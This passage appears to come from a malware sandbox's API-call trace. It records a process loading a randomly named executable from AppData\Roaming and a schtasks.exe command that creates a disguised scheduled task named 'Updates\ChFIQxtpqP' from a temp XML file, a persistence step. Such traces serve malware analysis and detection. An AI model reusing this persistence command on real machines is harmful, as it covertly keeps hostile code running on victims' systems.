[0188.347] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0188.347] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3dfb74 | out: lpMode=0x3dfb74) returned 1 [0188.347] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.347] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a444640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3dfba0, lpReserved=0x0 | out: lpBuffer=0x4a444640*, lpNumberOfCharsWritten=0x3dfba0*=0x2) returned 1 [0188.347] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a440640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0188.347] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a435260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0188.348] _vsnwprintf (in: _Buffer=0x4a435e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x3dfbb0 | out: _Buffer="C:\\Windows\\system32") returned 19 [0188.348] _vsnwprintf (in: _Buffer=0x4a435e66, _BufferCount=0x3eb, _Format="%c", _ArgList=0x3dfbb0 | out: _Buffer=">") returned 1 [0188.348] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.348] GetFileType (hFile=0x7) returned 0x2 [0188.348] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0188.348] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3dfb78 | out: lpMode=0x3dfb78) returned 1 [0188.348] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.349] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a435e40*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x3dfba4, lpReserved=0x0 | out: lpBuffer=0x4a435e40*, lpNumberOfCharsWritten=0x3dfba4*=0x14) returned 1 [0188.349] _get_osfhandle (_FileHandle=0) returned 0x3 [0188.349] GetFileType (hFile=0x3) returned 0x2 [0188.352] _get_osfhandle (_FileHandle=0) returned 0x3 [0188.352] GetFileType (hFile=0x3) returned 0x2 [0188.353] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0188.353] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x3dfe44 | out: lpMode=0x3dfe44) returned 1 [0188.353] _get_osfhandle (_FileHandle=0) returned 0x3 [0188.353] GetFileType (hFile=0x3) returned 0x2 [0188.353] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0188.353] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x3dfe44 | out: lpMode=0x3dfe44) returned 1 [0188.354] _get_osfhandle (_FileHandle=0) returned 0x3 [0188.354] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0188.354] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3dfdfc | out: lpConsoleScreenBufferInfo=0x3dfdfc) returned 1 [0188.354] ReadConsoleW (hConsoleInput=0x3, lpBuffer=0x4a43c640, nNumberOfCharsToRead=0x2000, lpNumberOfCharsRead=0x3dfe64, pInputControl=0x3dfe14) Thread: id = 188 os_tid = 0x7cc [0188.381] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76210000 [0188.382] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x76fa0000 [0188.382] LoadLibraryA (lpLibFileName="user32.dll") returned 0x75b00000 [0188.383] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\chfiqxtpqp.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0188.383] GetFileSize (in: hFile=0x74, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb7400 [0188.383] VirtualAlloc (lpAddress=0x0, dwSize=0xb7400, flAllocationType=0x3000, flProtect=0x4) returned 0x5a0000 [0188.383] ReadFile (in: hFile=0x74, lpBuffer=0x5a0000, nNumberOfBytesToRead=0xb7400, lpNumberOfBytesRead=0x4dfb98, lpOverlapped=0x0 | out: lpBuffer=0x5a0000*, lpNumberOfBytesRead=0x4dfb98*=0xb7400, lpOverlapped=0x0) returned 1 [0188.393] CloseHandle (hObject=0x74) returned 1 [0188.393] Sleep (dwMilliseconds=0x2ee0) [0200.913] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x7b8) returned 0x74 [0200.914] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x4dfbdc | out: lpExitCode=0x4dfbdc*=0x103) returned 1 [0200.914] CloseHandle (hObject=0x74) returned 1 [0200.914] Sleep (dwMilliseconds=0x2ee0) [0212.223] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x7b8) returned 0x74 [0212.223] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x4dfbdc | out: lpExitCode=0x4dfbdc*=0x103) returned 1 [0212.223] CloseHandle (hObject=0x74) returned 1 [0212.223] Sleep (dwMilliseconds=0x2ee0) [0222.254] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x7b8) returned 0x74 [0222.254] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x4dfbdc | out: lpExitCode=0x4dfbdc*=0x103) returned 1 [0222.254] CloseHandle (hObject=0x74) returned 1 [0222.254] Sleep (dwMilliseconds=0x2ee0) [0232.269] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x7b8) returned 0x74 [0232.269] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x4dfbdc | out: lpExitCode=0x4dfbdc*=0x103) returned 1 [0232.269] CloseHandle (hObject=0x74) returned 1 [0232.269] Sleep (dwMilliseconds=0x2ee0) [0242.300] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x7b8) returned 0x74 [0242.300] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x4dfbdc | out: lpExitCode=0x4dfbdc*=0x103) returned 1 [0242.300] CloseHandle (hObject=0x74) returned 1 [0242.300] Sleep (dwMilliseconds=0x2ee0) [0252.346] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x7b8) returned 0x74 [0252.346] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x4dfbdc | out: lpExitCode=0x4dfbdc*=0x103) returned 1 [0252.346] CloseHandle (hObject=0x74) returned 1 [0252.346] Sleep (dwMilliseconds=0x2ee0) [0262.572] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x7b8) returned 0x74 [0262.572] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x4dfbdc | out: lpExitCode=0x4dfbdc*=0x103) returned 1 [0262.572] CloseHandle (hObject=0x74) returned 1 [0262.572] Sleep (dwMilliseconds=0x2ee0) Process: id = "20" image_name = "schtasks.exe" filename = "c:\\windows\\syswow64\\schtasks.exe" page_root = "0x5eb62000" os_pid = "0x6a0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "16" os_parent_pid = "0x718" cmd_line = "\"C:\\Windows\\SysWOW64\\schtasks.exe\" /Create /TN \"Updates\\ChFIQxtpqP\" /XML \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp40F5.tmp\"" cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e51c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 198 os_tid = 0x6a8 [0195.230] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1dff5c | out: lpSystemTimeAsFileTime=0x1dff5c*(dwLowDateTime=0xbff71230, dwHighDateTime=0x1d6a092)) [0195.230] GetCurrentProcessId () returned 0x6a0 [0195.230] GetCurrentThreadId () returned 0x6a8 [0195.230] GetTickCount () returned 0x113eadc [0195.230] RtlQueryPerformanceCounter () returned 0x1 [0195.231] GetModuleHandleA (lpModuleName=0x0) returned 0x390000 [0195.231] __set_app_type (_Type=0x1) [0195.231] __p__fmode () returned 0x768131f4 [0195.231] __p__commode () returned 0x768131fc [0195.231] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3a7881) returned 0x0 [0195.232] __wgetmainargs (in: _Argc=0x3b9e6c, _Argv=0x3b9e74, _Env=0x3b9e70, _DoWildCard=0, _StartInfo=0x3b9e80 | out: _Argc=0x3b9e6c, _Argv=0x3b9e74, _Env=0x3b9e70) returned 0 [0195.232] _onexit (_Func=0x3b0fe2) returned 0x3b0fe2 [0195.232] _onexit (_Func=0x3b0ff3) returned 0x3b0ff3 [0195.232] _onexit (_Func=0x3b1002) returned 0x3b1002 [0195.232] _onexit (_Func=0x3b101e) returned 0x3b101e [0195.233] _onexit (_Func=0x3b103a) returned 0x3b103a [0195.233] _onexit (_Func=0x3b1056) returned 0x3b1056 [0195.233] _onexit (_Func=0x3b1072) returned 0x3b1072 [0195.233] _onexit (_Func=0x3b108e) returned 0x3b108e [0195.233] _onexit (_Func=0x3b10aa) returned 0x3b10aa [0195.233] _onexit (_Func=0x3b10c6) returned 0x3b10c6 [0195.233] _onexit (_Func=0x3b10e2) returned 0x3b10e2 [0195.233] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0195.233] WinSqmIsOptedIn () returned 0x0 [0195.234] GetProcessHeap () returned 0x420000 [0195.234] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x10) returned 0x434bd8 [0195.234] SetLastError (dwErrCode=0x0) [0195.234] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0195.234] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0195.234] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0195.234] VerifyVersionInfoW (in: lpVersionInformation=0x1df9d4, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x1df9d4) returned 1 [0195.234] GetProcessHeap () returned 0x420000 [0195.234] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x10) returned 0x434bf0 [0195.234] lstrlenW (lpString="") returned 0 [0195.234] GetProcessHeap () returned 0x420000 [0195.234] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x2) returned 0x433d20 [0195.234] GetProcessHeap () returned 0x420000 [0195.234] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x434fc0 [0195.234] GetProcessHeap () returned 0x420000 [0195.234] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x10) returned 0x434c08 [0195.234] GetProcessHeap () returned 0x420000 [0195.234] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x434fe0 [0195.234] GetProcessHeap () returned 0x420000 [0195.234] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x435000 [0195.235] GetProcessHeap () returned 0x420000 [0195.235] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x435020 [0195.235] GetProcessHeap () returned 0x420000 [0195.235] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x435040 [0195.235] GetProcessHeap () returned 0x420000 [0195.235] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x10) returned 0x434c20 [0195.235] GetProcessHeap () returned 0x420000 [0195.235] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x435060 [0195.235] GetProcessHeap () returned 0x420000 [0195.235] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x435080 [0195.235] GetProcessHeap () returned 0x420000 [0195.235] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x4350a0 [0195.235] GetProcessHeap () returned 0x420000 [0195.235] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x4350c0 [0195.235] GetProcessHeap () returned 0x420000 [0195.235] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x10) returned 0x434c38 [0195.235] GetProcessHeap () returned 0x420000 [0195.235] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x4350e0 [0195.235] GetProcessHeap () returned 0x420000 [0195.235] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x435118 [0195.235] GetProcessHeap () returned 0x420000 [0195.235] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x435138 [0195.235] GetProcessHeap () returned 0x420000 [0195.235] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x435158 [0195.235] SetThreadUILanguage (LangId=0x0) returned 0x409 [0195.236] SetLastError (dwErrCode=0x0) [0195.236] GetProcessHeap () returned 0x420000 [0195.236] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x435178 [0195.236] GetProcessHeap () returned 0x420000 [0195.236] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x435198 [0195.236] GetProcessHeap () returned 0x420000 [0195.236] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x4351b8 [0195.236] GetProcessHeap () returned 0x420000 [0195.236] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x4351d8 [0195.236] GetProcessHeap () returned 0x420000 [0195.236] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x4351f8 [0195.236] GetProcessHeap () returned 0x420000 [0195.236] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x10) returned 0x434c50 [0195.236] _memicmp (_Buf1=0x434c50, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.236] GetProcessHeap () returned 0x420000 [0195.236] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x208) returned 0x435a80 [0195.236] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x435a80, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0195.236] LoadLibraryExA (lpLibFileName="VERSION.dll", hFile=0x0, dwFlags=0x0) returned 0x74a00000 [0195.238] GetProcAddress (hModule=0x74a00000, lpProcName="GetFileVersionInfoSizeW") returned 0x74a019d9 [0195.238] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744 [0195.238] GetProcessHeap () returned 0x420000 [0195.238] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x74e) returned 0x435c90 [0195.238] GetProcAddress (hModule=0x74a00000, lpProcName="GetFileVersionInfoW") returned 0x74a019f4 [0195.238] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x435c90 | out: lpData=0x435c90) returned 1 [0195.239] GetProcAddress (hModule=0x74a00000, lpProcName="VerQueryValueW") returned 0x74a01b51 [0195.239] VerQueryValueW (in: pBlock=0x435c90, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1dfadc, puLen=0x1dfae0 | out: lplpBuffer=0x1dfadc*=0x43602c, puLen=0x1dfae0) returned 1 [0195.240] _memicmp (_Buf1=0x434c50, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.240] _vsnwprintf (in: _Buffer=0x435a80, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x1dfac4 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0195.240] VerQueryValueW (in: pBlock=0x435c90, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x1dfaec, puLen=0x1dfae8 | out: lplpBuffer=0x1dfaec*=0x435e58, puLen=0x1dfae8) returned 1 [0195.240] lstrlenW (lpString="schtasks.exe") returned 12 [0195.240] lstrlenW (lpString="schtasks.exe") returned 12 [0195.240] lstrlenW (lpString=".EXE") returned 4 [0195.240] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0195.240] lstrlenW (lpString="schtasks.exe") returned 12 [0195.240] lstrlenW (lpString=".EXE") returned 4 [0195.241] _memicmp (_Buf1=0x434c50, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.241] lstrlenW (lpString="schtasks") returned 8 [0195.241] GetProcessHeap () returned 0x420000 [0195.241] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x435238 [0195.241] GetProcessHeap () returned 0x420000 [0195.241] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x435258 [0195.241] GetProcessHeap () returned 0x420000 [0195.241] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x435278 [0195.241] GetProcessHeap () returned 0x420000 [0195.241] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x435298 [0195.241] GetProcessHeap () returned 0x420000 [0195.241] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x10) returned 0x434cb0 [0195.241] _memicmp (_Buf1=0x434cb0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.241] GetProcessHeap () returned 0x420000 [0195.241] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0xa0) returned 0x436670 [0195.241] GetProcessHeap () returned 0x420000 [0195.241] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x4352b8 [0195.241] GetProcessHeap () returned 0x420000 [0195.241] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x4352d8 [0195.241] GetProcessHeap () returned 0x420000 [0195.241] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x4352f8 [0195.241] GetProcessHeap () returned 0x420000 [0195.241] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x10) returned 0x434cc8 [0195.241] _memicmp (_Buf1=0x434cc8, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.241] GetProcessHeap () returned 0x420000 [0195.241] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x200) returned 0x436718 [0195.241] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x436718, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0195.241] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0195.242] GetProcessHeap () returned 0x420000 [0195.242] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x30) returned 0x436920 [0195.242] _vsnwprintf (in: _Buffer=0x436670, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x1dfac8 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29 [0195.242] GetProcessHeap () returned 0x420000 [0195.242] GetProcessHeap () returned 0x420000 [0195.242] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x435c90) returned 1 [0195.242] GetProcessHeap () returned 0x420000 [0195.242] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x435c90) returned 0x74e [0195.242] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x435c90 | out: hHeap=0x420000) returned 1 [0195.242] SetLastError (dwErrCode=0x0) [0195.242] GetThreadLocale () returned 0x409 [0195.242] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.242] lstrlenW (lpString="?") returned 1 [0195.242] GetThreadLocale () returned 0x409 [0195.242] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.242] lstrlenW (lpString="create") returned 6 [0195.242] GetThreadLocale () returned 0x409 [0195.242] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.242] lstrlenW (lpString="delete") returned 6 [0195.242] GetThreadLocale () returned 0x409 [0195.242] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.242] lstrlenW (lpString="query") returned 5 [0195.242] GetThreadLocale () returned 0x409 [0195.242] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.242] lstrlenW (lpString="change") returned 6 [0195.242] GetThreadLocale () returned 0x409 [0195.242] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.242] lstrlenW (lpString="run") returned 3 [0195.242] GetThreadLocale () returned 0x409 [0195.242] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.242] lstrlenW (lpString="end") returned 3 [0195.242] GetThreadLocale () returned 0x409 [0195.242] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.242] lstrlenW (lpString="showsid") returned 7 [0195.242] GetThreadLocale () returned 0x409 [0195.243] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.243] SetLastError (dwErrCode=0x0) [0195.243] SetLastError (dwErrCode=0x0) [0195.243] lstrlenW (lpString="/Create") returned 7 [0195.243] lstrlenW (lpString="-/") returned 2 [0195.243] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0195.243] lstrlenW (lpString="?") returned 1 [0195.243] lstrlenW (lpString="?") returned 1 [0195.243] GetProcessHeap () returned 0x420000 [0195.243] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x10) returned 0x434ce0 [0195.243] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.243] GetProcessHeap () returned 0x420000 [0195.243] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0xa) returned 0x434cf8 [0195.243] lstrlenW (lpString="Create") returned 6 [0195.243] GetProcessHeap () returned 0x420000 [0195.243] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x10) returned 0x434d10 [0195.243] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.243] GetProcessHeap () returned 0x420000 [0195.243] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x435318 [0195.243] _vsnwprintf (in: _Buffer=0x434cf8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|?|") returned 3 [0195.243] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|Create|") returned 8 [0195.243] lstrlenW (lpString="|?|") returned 3 [0195.243] lstrlenW (lpString="|Create|") returned 8 [0195.243] SetLastError (dwErrCode=0x490) [0195.243] lstrlenW (lpString="create") returned 6 [0195.243] lstrlenW (lpString="create") returned 6 [0195.243] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.243] GetProcessHeap () returned 0x420000 [0195.243] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x434cf8) returned 1 [0195.243] GetProcessHeap () returned 0x420000 [0195.243] RtlReAllocateHeap (Heap=0x420000, Flags=0xc, Ptr=0x434cf8, Size=0x14) returned 0x435338 [0195.243] lstrlenW (lpString="Create") returned 6 [0195.243] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.244] _vsnwprintf (in: _Buffer=0x435338, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|create|") returned 8 [0195.244] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|Create|") returned 8 [0195.244] lstrlenW (lpString="|create|") returned 8 [0195.244] lstrlenW (lpString="|Create|") returned 8 [0195.244] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|" [0195.244] SetLastError (dwErrCode=0x0) [0195.244] SetLastError (dwErrCode=0x0) [0195.244] SetLastError (dwErrCode=0x0) [0195.244] lstrlenW (lpString="/TN") returned 3 [0195.244] lstrlenW (lpString="-/") returned 2 [0195.244] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0195.244] lstrlenW (lpString="?") returned 1 [0195.244] lstrlenW (lpString="?") returned 1 [0195.244] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.244] lstrlenW (lpString="TN") returned 2 [0195.244] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.244] _vsnwprintf (in: _Buffer=0x435338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|?|") returned 3 [0195.244] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|TN|") returned 4 [0195.244] lstrlenW (lpString="|?|") returned 3 [0195.244] lstrlenW (lpString="|TN|") returned 4 [0195.244] SetLastError (dwErrCode=0x490) [0195.244] lstrlenW (lpString="create") returned 6 [0195.244] lstrlenW (lpString="create") returned 6 [0195.244] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.244] lstrlenW (lpString="TN") returned 2 [0195.244] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.244] _vsnwprintf (in: _Buffer=0x435338, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|create|") returned 8 [0195.244] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|TN|") returned 4 [0195.244] lstrlenW (lpString="|create|") returned 8 [0195.244] lstrlenW (lpString="|TN|") returned 4 [0195.244] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0 [0195.244] SetLastError (dwErrCode=0x490) [0195.244] lstrlenW (lpString="delete") returned 6 [0195.245] lstrlenW (lpString="delete") returned 6 [0195.245] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.245] lstrlenW (lpString="TN") returned 2 [0195.245] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.245] _vsnwprintf (in: _Buffer=0x435338, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|delete|") returned 8 [0195.245] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|TN|") returned 4 [0195.245] lstrlenW (lpString="|delete|") returned 8 [0195.245] lstrlenW (lpString="|TN|") returned 4 [0195.245] StrStrIW (lpFirst="|delete|", lpSrch="|TN|") returned 0x0 [0195.245] SetLastError (dwErrCode=0x490) [0195.245] lstrlenW (lpString="query") returned 5 [0195.245] lstrlenW (lpString="query") returned 5 [0195.245] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.245] lstrlenW (lpString="TN") returned 2 [0195.245] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.245] _vsnwprintf (in: _Buffer=0x435338, _BufferCount=0x8, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|query|") returned 7 [0195.245] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|TN|") returned 4 [0195.245] lstrlenW (lpString="|query|") returned 7 [0195.245] lstrlenW (lpString="|TN|") returned 4 [0195.245] StrStrIW (lpFirst="|query|", lpSrch="|TN|") returned 0x0 [0195.245] SetLastError (dwErrCode=0x490) [0195.245] lstrlenW (lpString="change") returned 6 [0195.245] lstrlenW (lpString="change") returned 6 [0195.245] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.245] lstrlenW (lpString="TN") returned 2 [0195.245] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.245] _vsnwprintf (in: _Buffer=0x435338, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|change|") returned 8 [0195.245] _vsnwprintf (in: 